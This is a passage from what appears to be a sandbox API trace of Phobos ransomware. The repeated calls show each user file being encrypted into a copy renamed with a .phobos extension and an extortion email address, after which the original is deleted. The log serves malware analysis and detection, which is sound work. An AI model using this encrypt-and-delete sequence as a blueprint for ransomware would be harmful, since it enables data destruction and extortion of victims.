lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0189.745] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.745] CloseHandle (hObject=0x164) returned 1 [0189.745] CloseHandle (hObject=0x14c) returned 1 [0189.786] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg")) returned 1 [0189.789] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0189.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0189.805] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=23871) returned 1 [0189.805] CloseHandle (hObject=0x14c) returned 1 [0189.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg")) returned 0x2020 [0189.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0189.805] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.806] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.806] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0189.806] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.806] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5d3f, lpOverlapped=0x0) returned 1 [0189.829] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5d40, dwBufLen=0x5d40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5d40) returned 1 [0189.829] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5d40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5d40, lpOverlapped=0x0) returned 1 [0189.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0189.831] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.831] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0189.831] CryptDestroyKey (hKey=0xa32c28) returned 1 [0189.831] WriteFile (in: hFile=0x164, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0189.831] CryptDestroyKey (hKey=0xa327e8) returned 1 [0189.831] CloseHandle (hObject=0x14c) returned 1 [0189.831] CloseHandle (hObject=0x164) returned 1 [0189.831] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg")) returned 1 [0189.833] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0189.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.979] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6406) returned 1 [0189.979] CloseHandle (hObject=0x164) returned 1 [0189.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg")) returned 0x2020 [0189.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0189.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0189.980] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.980] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0189.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0189.981] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0189.981] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0189.981] ReadFile (in: hFile=0x164, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1906, lpOverlapped=0x0) returned 1 [0190.377] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1910, dwBufLen=0x1910 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1910) returned 1 [0190.377] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1910, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1910, lpOverlapped=0x0) returned 1 [0190.378] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.378] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.378] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0190.378] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.378] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0190.378] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.378] CloseHandle (hObject=0x164) returned 1 [0190.378] CloseHandle (hObject=0x14c) returned 1 [0190.378] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg")) returned 1 [0190.389] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.389] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=232) returned 1 [0190.389] CloseHandle (hObject=0x194) returned 1 [0190.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm")) returned 0x2020 [0190.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.390] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.390] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.390] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.390] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.390] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe8, lpOverlapped=0x0) returned 1 [0190.391] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0190.391] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0190.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0190.392] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.392] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.392] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.392] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.393] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.393] CloseHandle (hObject=0x194) returned 1 [0190.393] CloseHandle (hObject=0x134) returned 1 [0190.393] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm")) returned 1 [0190.393] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.394] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5115) returned 1 [0190.394] CloseHandle (hObject=0x134) returned 1 [0190.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg")) returned 0x2020 [0190.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.394] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.395] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.395] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.395] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.395] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x13fb, lpOverlapped=0x0) returned 1 [0190.422] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1400, dwBufLen=0x1400 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1400) returned 1 [0190.422] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1400, lpOverlapped=0x0) returned 1 [0190.423] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.423] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.423] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.423] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.423] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.423] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.423] CloseHandle (hObject=0x134) returned 1 [0190.423] CloseHandle (hObject=0x194) returned 1 [0190.423] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg")) returned 1 [0190.424] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.425] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=233) returned 1 [0190.425] CloseHandle (hObject=0x194) returned 1 [0190.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm")) returned 0x2020 [0190.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.425] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.425] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.426] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.426] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.427] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe9, lpOverlapped=0x0) returned 1 [0190.427] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0190.427] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0190.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.428] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.428] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.428] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.428] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.428] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.428] CloseHandle (hObject=0x194) returned 1 [0190.428] CloseHandle (hObject=0x134) returned 1 [0190.429] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm")) returned 1 [0190.429] CryptGenRandom (in: 